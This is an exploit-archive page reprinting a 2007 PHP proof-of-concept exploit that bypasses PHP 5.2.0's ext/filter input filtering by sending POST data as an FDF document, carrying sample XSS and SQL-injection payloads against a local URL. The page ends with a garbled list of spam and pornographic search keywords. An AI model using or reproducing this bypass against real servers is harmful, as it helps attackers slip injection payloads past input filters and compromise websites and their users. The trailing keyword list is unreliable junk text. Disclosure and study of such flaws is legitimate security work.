about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , PHP <= 5.2.0 ext/filter FDF Post Filter Bypass Exploit




2007-03-10 PHP <= 5.2.0 ext/filter FDF Post Filter Bypass Exploit
Rated as : High Risk

<?php
 
////////////////////////////////////////////////////////////////////////
  //  _  _                _                     _       ___  _  _  ___ 
//
  // | || | __ _  _ _  __| | ___  _ _   ___  __| | ___ | _ \| || || _ \
//
  // | __ |/ _` || '_|/ _` |/ -_)| ' \ / -_)/ _` ||___||  _/| __ ||  _/
//
  // |_||_|\__,_||_|  \__,_|\___||_||_|\___|\__,_|     |_|  |_||_||_|  
//
  //                                                                   
//
  //         Proof of concept code from the Hardened-PHP Project       
//
  //                   (C) Copyright 2007 Stefan Esser                 
//
  //                                                                   
//
 
////////////////////////////////////////////////////////////////////////
  //            PHP ext/filtet FDF POST Filter Bybass Exploit          
//
 
////////////////////////////////////////////////////////////////////////

  // This is meant as a protection against remote file inclusion.
  die("REMOVE THIS LINE");

  // _POST is the array that will be sent to the url in $url
  $_POST = array();
  $_POST['var1'] =
"<script>alert(/XSS/);</script>";
  $_POST['var2'] = " ' UNION SELECT ";

  $url = "http://127.0.0.1/info.php";  
  
  // You do not need to change anything below this
  
  $outfdf = fdf_create();
  foreach ($_POST as $key => $value) {
    fdf_set_value($outfdf, $key, $value, 0);
  }
  fdf_save($outfdf, "outtest.fdf");
  fdf_close($outfdf);
  
  $ret = file_get_contents("outtest.fdf");
  unlink("outtest.fdf");
  
  $params = array('http' => array(
      'method' => 'POST',
      'content' => $ret,
      'header' => 'Content-Type: application/vnd.fdf'
  ));
  
  $ctx = stream_context_create($params);
  $fp = @fopen($url, 'rb', false, $ctx);
  if (!$fp) {
    die("Cannot open $url");
  }
  $response = @stream_get_contents($fp); 

  echo $response;
  echo "\n";
?> 
securitydot.net - 2007-03-10

Advertising

Copyright 2007, SecurityDot
Fri, 11 Dec 2009 16:24:17 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
200 /compo +...t%252F +...t%252F Grl free anima F s call Www.animal katrina ka www.813sun bie news for c Www.fan co www.indian news for c www.zf-u8. Xxxvido Searching karina kpo F s call aunty sex GoldCoders atm ijuhe.webz www.812sun fuckgril+s sexbf g....indon FTP Servic www.678sun DoS Apache WWW 98SEX WwwEUROP.s www.trish PHP Advanc www.0755dr news for c www.xigre. WWW.SIXY17 Girls In s www.437600 User crede evotopsite qpopper 4. excitement lo465l Thirisha p www.218sun filezilla bluequartz Www.sleazy